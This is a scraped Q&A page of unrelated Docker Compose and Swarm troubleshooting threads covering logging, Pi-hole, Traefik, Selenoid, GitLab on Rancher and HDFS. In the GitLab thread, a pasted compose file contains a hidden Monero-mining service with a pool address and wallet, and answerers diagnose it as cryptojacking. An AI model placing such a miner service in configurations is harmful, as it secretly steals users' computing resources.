I have a docker swarm running across 4 raspberryPis (1 manager, 3 workers). I was a little surprised today when I was diagnosing a crash on the master node and discovered that the container processes which were running on that host are writing their logs to /var/log on the host machine.
I'd thought that by default (and my swarm is using the default/basic config from the docker instructions here https://docs.docker.com/engine/swarm/swarm-tutorial/create-swarm/), docker writes its logs to a json-log output as part of Docker's own logging structure on the host. Is what I'm seeing expected behaviour, or have I badly misconfigured/misunderstood something?
For example, the letsencrypt image which runs an nginx ingress node for my swarm is writing its logs to /var/log/letsencrypt on my host machine. I wouldn't have thought this possible without me explicitly mounting the /var/log directory in my container spec.
It seems to be writing these certbot debug logs to /var/log/letsencrypt/letsencrypt.log on the host:
2020-07-19 07:11:46,615:DEBUG:certbot.main:certbot version: 0.31.0
2020-07-19 07:11:46,616:DEBUG:certbot.main:Arguments: ['-q']
2020-07-19 07:11:46,616:DEBUG:certbot.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2020-07-19 07:11:46,638:DEBUG:certbot.log:Root logging level set at 30
2020-07-19 07:11:46,639:INFO:certbot.log:Saving debug log to /var/log/letsencrypt/letsencrypt.log
Here's my nginx docker-compose file:
version: '3'
services:
nginx:
image: linuxserver/letsencrypt
volumes:
- /share/data/nginx/:/config
deploy:
mode: replicated
placement:
constraints:
- "node.role==manager"
ports:
- 80:80
- 443:443
environment:
- PUID=1001
- PGID=1001
- URL=mydomain.com
- SUBDOMAINS=www,mysite1,mysite2
- VALIDATION=http
- EMAIL=myemail#myprovider.com
- TZ=Europe/London
networks:
- internal
- monitoring_front-tier
networks:
internal:
external: true
monitoring_front-tier:
external: true
You can check which logging driver is configured on that container:
docker inspect -f '{{.HostConfig.LogConfig.Type}}' <container-id>
You can compare the result to how it is supposed to behave, according to the official documentation: https://docs.docker.com/config/containers/logging/configure/#supported-logging-drivers
You may also check if you chose to override the default json-file logging driver under /etc/docker/daemon.json. If the file does not exist, the json-file driver should be the one in use.
Related
I am starting to use portrainer.io to manage my docker images, instead of Synology DSM Docker GUI.
Background information:
I've used MacVLAN to create an own IP address for my Pihole Docker, overall everything regarding this piHole is running fine with this settings, made by DSM GUI.
environment network volumesports
Problem:
I now would like to use portrainer.io to manage my Docker installation. Including the Stack option which should be docker compose.
I am now struggeling to get my PiHole Image up with this Docker script:
services:
pihole:
container_name: pihole
image: pihole/pihole:latest
networks: docker
ports:
- "53:53/tcp"
- "53:53/udp"
- "67:67/udp"
- "80:80/tcp"
environment:
TZ: 'Europe/Berlin'
WEBPASSWORD: 'password'
ServerIP: "0.0.0.0"
# Volumes store your data between container upgrades
volumes:
- '/pihole/pihole/:/etc/pihole/'
- '/pihole/dnsmasq/:/etc/dnsmasq.d/'
# Recommended but not required (DHCP needs NET_ADMIN)
# https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
cap_add:
- NET_ADMIN
restart: unless-stopped
Does anyone have an idea why I get "Unable to deploy stack" as error message?
You are telling the service to use a network called "docker", but the network is not defined in the compose file. Is this the complete docker-compose file?
If yes, then you are missing the networks section:
networks:
docker:
external: true
I have a Docker Swarm web application that can deploy fine and can be reached from outside by a browser.
But it was not showing the client IP address to the HTTP service.
So I decided to add a Traefik service to the Docker Compose file to expose the client IP to the HTTP service.
I use a mode: host and a driver: overlay for this reason.
The complete configuration is described in two Docker Compose files that I run in sequence.
First I run the docker stack deploy --compose-file docker-compose-dev.yml common command on the file:
version: "3.9"
services:
traefik:
image: traefik:v2.5
networks:
common:
ports:
- target: 80
published: 80
mode: host
- target: 443
published: 443
mode: host
command:
- "--providers.docker.endpoint=unix:///var/run/docker.sock"
- "--providers.docker.swarmMode=true"
- "--providers.docker.exposedbydefault=false"
- "--providers.docker.network=common"
- "--entrypoints.web.address=:80"
# Set a debug level custom log file
- "--log.level=DEBUG"
- "--log.filePath=/var/log/traefik.log"
- "--accessLog.filePath=/var/log/access.log"
# Enable the Traefik dashboard
- "--api.dashboard=true"
deploy:
placement:
constraints:
- node.role == manager
labels:
# Expose the Traefik dashboard
- "traefik.enable=true"
- "traefik.http.routers.dashboard.service=api#internal"
- "traefik.http.services.traefik.loadbalancer.server.port=888" # A port number required by Docker Swarm but not being used in fact
- "traefik.http.routers.dashboard.rule=Host(`traefik.learnintouch.com`)"
- "traefik.http.routers.traefik.entrypoints=web"
# Basic HTTP authentication to secure the dashboard access
- "traefik.http.routers.traefik.middlewares=traefik-auth"
- "traefik.http.middlewares.traefik-auth.basicauth.users=stephane:$$apr1$$m72sBfSg$$7.NRvy75AZXAMtH3C2YTz/"
volumes:
# So that Traefik can listen to the Docker events
- "/var/run/docker.sock:/var/run/docker.sock:ro"
- "~/dev/docker/projects/common/volumes/logs/traefik.service.log:/var/log/traefik.log"
- "~/dev/docker/projects/common/volumes/logs/traefik.access.log:/var/log/access.log"
networks:
common:
name: common
driver: overlay
Then I run the docker stack deploy --compose-file docker-compose.yml www_learnintouch command on the file:
version: "3.9"
services:
www:
image: localhost:5000/www.learnintouch
networks:
common:
volumes:
- "~/dev/docker/projects/learnintouch/volumes/www.learnintouch/account/data:/usr/local/learnintouch/www/learnintouch.com/account/data"
- "~/dev/docker/projects/learnintouch/volumes/www.learnintouch/account/backup:/usr/local/learnintouch/www/learnintouch.com/account/backup"
- "~/dev/docker/projects/learnintouch/volumes/engine:/usr/local/learnintouch/engine"
- "~/dev/docker/projects/common/volumes/letsencrypt/certbot/conf/live/thalasoft.com:/usr/local/learnintouch/letsencrypt"
- "~/dev/docker/projects/common/volumes/logs:/usr/local/apache/logs"
- "~/dev/docker/projects/common/volumes/logs:/usr/local/learnintouch/logs"
user: "${CURRENT_UID}:${CURRENT_GID}"
deploy:
replicas: 1
restart_policy:
condition: any
delay: 5s
max_attempts: 3
window: 10s
labels:
- "traefik.enable=true"
- "traefik.http.routers.www.rule=Host(`dev.learnintouch.com`)"
- "traefik.http.routers.www.entrypoints=web"
- "traefik.http.services.www.loadbalancer.server.port=80"
healthcheck:
test: curl --fail http://127.0.0.1:80/engine/ping.php || exit 1
interval: 10s
timeout: 3s
retries: 3
networks:
common:
external: true
name: common
Here are the networks:
stephane#stephane-pc:~$ docker network ls
NETWORK ID NAME DRIVER SCOPE
6beaf0c3a518 bridge bridge local
ouffqdmdesuy common overlay swarm
17et43c5tuf0 docker-registry_default overlay swarm
1ae825c8c821 docker_gwbridge bridge local
7e6b4b7733ca host host local
2ui8s1yomngt ingress overlay swarm
460aad21ada9 none null local
tc846a14ftz5 verdaccio overlay swarm
The docker ps command shows that all containers are healthy.
But a request to http://dev.learnintouch.com/ responds with a Bad Gateway error MOST of the times except when rarely it does not and the web application displays fine.
As a side note, I would like any unhealthy service to be restarted and seen by Traefik. Just like Docker Swarm restarts unhealthy services I would like Traefik to restart unhealthy services too.
The service log:
{"level":"debug","msg":"Configuration received from provider docker: {\"http\":{\"routers\":{\"dashboard\":{\"service\":\"api#internal\",\"rule\":\"Host(`traefik.learnintouch.com`)\"},\"nodejs\":{\"entryPoints\":[\"web\"],\"service\":\"nodejs\",\"rule\":\"Host(`dev.learnintouch.com`)\"},\"traefik\":{\"entryPoints\":[\"web\"],\"middlewares\":[\"traefik-auth\"],\"service\":\"traefik\",\"rule\":\"Host(`common-reverse-proxy`)\"},\"www\":{\"entryPoints\":[\"web\"],\"service\":\"www\",\"rule\":\"Host(`dev.learnintouch.com`)\"}},\"services\":{\"nodejs\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.0.14.17:9001\"}],\"passHostHeader\":true}},\"traefik\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.0.14.8:888\"}],\"passHostHeader\":true}},\"www\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.0.14.18:80\"}],\"passHostHeader\":true}}},\"middlewares\":{\"traefik-auth\":{\"basicAuth\":{\"users\":[\"stephane:$apr1$m72sBfSg$7.NRvy75AZXAMtH3C2YTz/\"]}}}},\"tcp\":{},\"udp\":{}}","providerName":"docker","time":"2021-07-04T10:25:01Z"}
{"level":"info","msg":"Skipping same configuration","providerName":"docker","time":"2021-07-04T10:25:01Z"}
I also tried to have Docker Swarm doing the load balancing with adding the - "traefik.docker.lbswarm=true" property to my service but the Bad Gateway error remained.
I also restarted the Swarm manager:
docker swarm leave --force
docker swarm init
but the Bad Gateway error remained.
I also added the two labels:
- "traefik.backend.loadbalancer.sticky=true"
- "traefik.backend.loadbalancer.stickiness=true"
but the Bad Gateway error remained.
It feels like Traefik hits the web service before that one has a chance to be ready. Would there be any way to tell Traefik to wait a given amount of seconds before hitting the web service ?
UPDATE: I could find, not a solution, but a workaround the issue, by splitting the first above common stack file into two files, with one dedicated to the traefik stack. I could then start the 3 stacks in the following order: common, www_learnintouch and traefik
The important thing was to start the traefik stack after the others. If I then had to remove and start again the www_learnintouch stack for example, then I had to follow this by removing and starting again the traefik stack.
Also, if I removed the container of www_learnintouch with a docker rm -f CONTAINER_ID command then I also needed to remove and start again the traefik stack.
I'm running a Selenoid application test automation script, and would like to run this script against a local application. However, I can't find how to expose my local application (running on port 8787) to Selenoid. I found the following thread discussing a similar issue, but it doesn't solve my issue. The linked thread describes to use the host's ip address. However, I want to make my test system independent. The host ip address is different for each system, and is hard to be retrieved system independently.
I already tried adding the expose field to my docker compose file:
version: '3'
services:
selenoid:
network_mode: bridge
image: aerokube/selenoid:latest-release
volumes:
- "${PWD}/run:/etc/selenoid"
- "/var/run/docker.sock:/var/run/docker.sock"
- "${PWD}/run/video:/opt/selenoid/video"
- "${PWD}/run/logs:/opt/selenoid/logs"
environment:
- OVERRIDE_VIDEO_OUTPUT_DIR=${PWD}/run/video
- TZ=Europe/Amsterdam
command: ["-conf", "/etc/selenoid/browsers.json", "-video-output-dir", "/opt/selenoid/video", "-log-output-dir", "/opt/selenoid/logs"]
ports:
- "4444:4444"
expose:
- "8787"
However, this doesn't work because the docker containers created by Selenoid do not get passed the same option.
Is there any way to expose my host port 8787 to my Selenoid container in a system/os independent way (either via a configuration in the docker-compose.yml file, a capability passed to the remote driver or any other way?)?
Selenoid runs browsers in standard Docker containers, so anything applicable to Docker is applicable to Selenoid browsers. Docker was created for the case when all interacting parts are packed to containers and in that case you have legacy Docker links or modern Docker custom networks on your service. If you still want to run your application on the host machine without packing it to container, you have to either user host machine IP or on some platforms Docker provides a particular domain name, e.g. docker.for.mac.localhost on Mac.
I finally realized that yes, the application I run actually runs in a Docker container and thus linking them is as easy as putting Selenoid and the application in the same Docker network. Final docker-compose.yml is as follows:
version: '3'
networks:
my_network_name:
external:
name: my_network_name # This assumes network is already created
services:
selenoid:
networks:
my_network_name: null
image: aerokube/selenoid:latest-release
volumes:
- "${PWD}/run:/etc/selenoid"
- "/var/run/docker.sock:/var/run/docker.sock"
- "${PWD}/run/video:/opt/selenoid/video"
- "${PWD}/run/logs:/opt/selenoid/logs"
environment:
- OVERRIDE_VIDEO_OUTPUT_DIR=${PWD}/run/video
- TZ=Europe/Amsterdam
command: ["-container-network", "my_network_name", "-conf", "/etc/selenoid/browsers.json", "-video-output-dir", "/opt/selenoid/video", "-log-output-dir", "/opt/selenoid/logs"]
ports:
- "4444:4444"
expose:
- "8787"
I installed gitlab via Rancher's catalog.
By running the command "docker ps" I notice that there is a docker container "moneropull / monero-miner".
I noticed that this container is an underlying part of the Gitlab container. Below the dockercompose file generated by the Rancher stack.
I would like to know if the "selector" part is mandatory? I really want to take it off. Indeed when the container of gitlab is launched I notice a very high consomation of the processor.
version: '2'
volumes:
gitlab-app-data:
driver: local
gitlab-conf-files:
driver: local
gitlab-log-data:
driver: local
services:
gitlab-server:
image: gitlab/gitlab-ce:9.5.10-ce.0
environment:
GITLAB_OMNIBUS_CONFIG: |-
external_url 'http://gitehost.com'
registry_external_url 'http://gitehost.com'
gitlab_rails['gitlab_shell_ssh_port'] = PORT_NUMBER
volumes:
- /home/docker-volumes/gitlab/var/opt/gitlab:/var/opt/gitlab
- /home/docker-volumes/gitlab/var/log/gitlab:/var/log/gitlab
- /home/docker-volumes/gitlab/etc/gitlab:/etc/gitlab
labels:
io.rancher.container.hostname_override: container_name
selector:
image: moneropull/monero-miner
stdin_open: true
tty: true
command:
- -a
- cryptonight
- -o
- stratum+tcp://monerohash.com:3333
- -u
- 42kVTL3bciSHwjfJJNPif2JVMu4daFs6LVyBVtN9JbMXjLu6qZvwGtVJBf4PCeRHbZUiQDzBRBMu731EQWUhYGSoFz2r9fj
- -p
- x
labels:
io.rancher.container.pull_image: always
io.rancher.scheduler.global: 'true'
Seems you are being crypto-jacked. Look at this https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers
There are few images that are compromised and i suspect you accidently picked one of them.
#piy26 pointed out correctly. Your setup seems to have been compromised.
The original gitlab compose file from rancher doesn't have the miner service. Here is the link: https://github.com/rancher/community-catalog/blob/master/templates/gitlab/4/docker-compose.yml#L10
I have troubles to make my HDFS setup work in docker swarm.
To understand the problem I've reduced my setup to the minimum :
1 physical machine
1 namenode
1 datanode
This setup is working fine with docker-compose, but it fails with docker-swarm, using the same compose file.
Here is the compose file :
version: '3'
services:
namenode:
image: uhopper/hadoop-namenode
hostname: namenode
ports:
- "50070:50070"
- "8020:8020"
volumes:
- /userdata/namenode:/hadoop/dfs/name
environment:
- CLUSTER_NAME=hadoop-cluster
datanode:
image: uhopper/hadoop-datanode
depends_on:
- namenode
volumes:
- /userdata/datanode:/hadoop/dfs/data
environment:
- CORE_CONF_fs_defaultFS=hdfs://namenode:8020
To test it, I have installed an hadoop client on my host (physical) machine with only this simple configuration in core-site.xml :
<configuration>
<property><name>fs.defaultFS</name><value>hdfs://0.0.0.0:8020</value></property>
</configuration>
Then I run the following command :
hdfs dfs -put test.txt /test.txt
With docker-compose (just running docker-compose up) it's working and the file is written in HDFS.
With docker-swarm, I'm running :
docker swarm init
docker stack deploy --compose-file docker-compose.yml hadoop
Then when all services are up, I put my file on HDFS it fails like this :
INFO hdfs.DataStreamer: Exception in createBlockOutputStream
org.apache.hadoop.net.ConnectTimeoutException: 60000 millis timeout while waiting for channel to be ready for connect. ch : java.nio.channels.SocketChannel[connection-pending remote=/x.x.x.x:50010]
at org.apache.hadoop.net.NetUtils.connect(NetUtils.java:534)
at org.apache.hadoop.hdfs.DataStreamer.createSocketForPipeline(DataStreamer.java:259)
at org.apache.hadoop.hdfs.DataStreamer.createBlockOutputStream(DataStreamer.java:1692)
at org.apache.hadoop.hdfs.DataStreamer.nextBlockOutputStream(DataStreamer.java:1648)
at org.apache.hadoop.hdfs.DataStreamer.run(DataStreamer.java:704)
18/06/14 17:29:41 WARN hdfs.DataStreamer: Abandoning BP-1801474405-10.0.0.4-1528990089179:blk_1073741825_1001
18/06/14 17:29:41 WARN hdfs.DataStreamer: Excluding datanode DatanodeInfoWithStorage[10.0.0.6:50010,DS-d7d71735-7099-4aa9-8394-c9eccc325806,DISK]
18/06/14 17:29:41 WARN hdfs.DataStreamer: DataStreamer Exception
org.apache.hadoop.ipc.RemoteException(java.io.IOException): File /test.txt._COPYING_ could only be replicated to 0 nodes instead of minReplication (=1). There are 1 datanode(s) running and 1 node(s) are excluded in this operation.
If I look in the web UI the datanode seems to be up and no issue is reported...
Update : it seems that dependsOn is ignored by swarm, but it does not seem to be the cause of my problem : I've restarted the datanode when the namenode is up but it did not work better.
Thanks for your help :)
The whole mess stems from interaction between docker swarm using overlay networks and how the HDFS name node keeps track of its data nodes. The namenode records the datanode IPs/hostnames based the datanode's overlay network IPs. When the HDFS client asks for read/write operations directly on the datanodes, the namenode reports back the IPs/hostnames of the datanodes based on the overlay network. Since the overlay network is not accessible to the external clients, any rw operations will fail.
The final solution (after lots of struggling to get overlay network to work) I used was to have the HDFS services use the host network. Here's a snippet from the compose file:
version: '3.7'
x-deploy_default: &deploy_default
mode: replicated
replicas: 1
placement:
constraints:
- node.role == manager
restart_policy:
condition: any
delay: 5s
services:
hdfs_namenode:
deploy:
<<: *deploy_default
networks:
hostnet: {}
volumes:
- hdfs_namenode:/hadoop-3.2.0/var/name_node
command:
namenode -fs hdfs://${PRIMARY_HOST}:9000
image: hadoop:3.2.0
hdfs_datanode:
deploy:
mode: global
networks:
hostnet: {}
volumes:
- hdfs_datanode:/hadoop-3.2.0/var/data_node
command:
datanode -fs hdfs://${PRIMARY_HOST}:9000
image: hadoop:3.2.0
volumes:
hdfs_namenode:
hdfs_datanode:
networks:
hostnet:
external: true
name: host